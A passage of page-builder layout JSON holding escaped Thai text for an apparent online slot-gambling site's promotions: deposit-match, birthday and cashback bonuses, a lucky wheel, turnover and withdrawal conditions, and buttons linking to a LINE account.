100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" 